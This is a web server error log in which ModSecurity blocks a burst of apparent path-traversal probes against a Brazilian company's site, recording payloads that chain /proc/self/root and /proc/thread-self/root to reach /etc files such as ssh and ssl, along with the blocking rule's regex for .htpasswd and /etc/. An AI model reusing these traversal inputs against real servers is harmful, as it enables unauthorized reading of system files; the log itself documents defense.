[Thu Mar 19 04:58:57.459252 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:44534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuswAkwaGbbGflqUZCGYQAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:58:59.046066 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:52044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusw_u8EFLIOrSqIptvMQAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:00.407201 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:52050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusxBkFeYa1D6dYQnC_VAAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:04.135528 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:52058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusyOyqAr6etmhZHNo0bAAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:05.451101 2026] [:error] [pid 19093:tid 140411557287680] [client 74.7.241.31:52074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusyV_V7PWP6ixUYl6MvQAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:06.782559 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:52086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusyvu8EFLIOrSqIptvNAAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:08.126262 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:40626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuszOoXxyEfFpUF8f_hjgAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:09.451114 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:40632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuszda6ubjKNq_cu4YS4gAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:10.793700 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.241.31:40638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuszhkFeYa1D6dYQnC_WAAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:11.136625 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:55760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusz_-YZRR_7pZ7nDJePQAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:59:12.265510 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:40646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus0AkwaGbbGflqUZCGaQAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:13.675723 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:40662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus0cdf6f5d65gmYZRERwAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:15.011072 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.241.31:40678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus0xkFeYa1D6dYQnC_WgAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:18.834787 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:40686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus1da6ubjKNq_cu4YS6wAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:20.256490 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:35652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus2Na6ubjKNq_cu4YS7gAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:21.546939 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:35664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus2da6ubjKNq_cu4YS8AAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:22.865117 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:35672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus2gkwaGbbGflqUZCGbwAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:24.155047 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:35684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus3P-YZRR_7pZ7nDJeRAAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:25.456887 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:35700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus3QkwaGbbGflqUZCGcwAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:28.013439 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.241.31:35708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus3hkFeYa1D6dYQnC_YQAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:31.703145 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:60236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus4-oXxyEfFpUF8f_hngAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:33.087390 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:60240] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus5eoXxyEfFpUF8f_hoAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:59:35.480188 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:60244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abus58df6f5d65gmYZREWAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
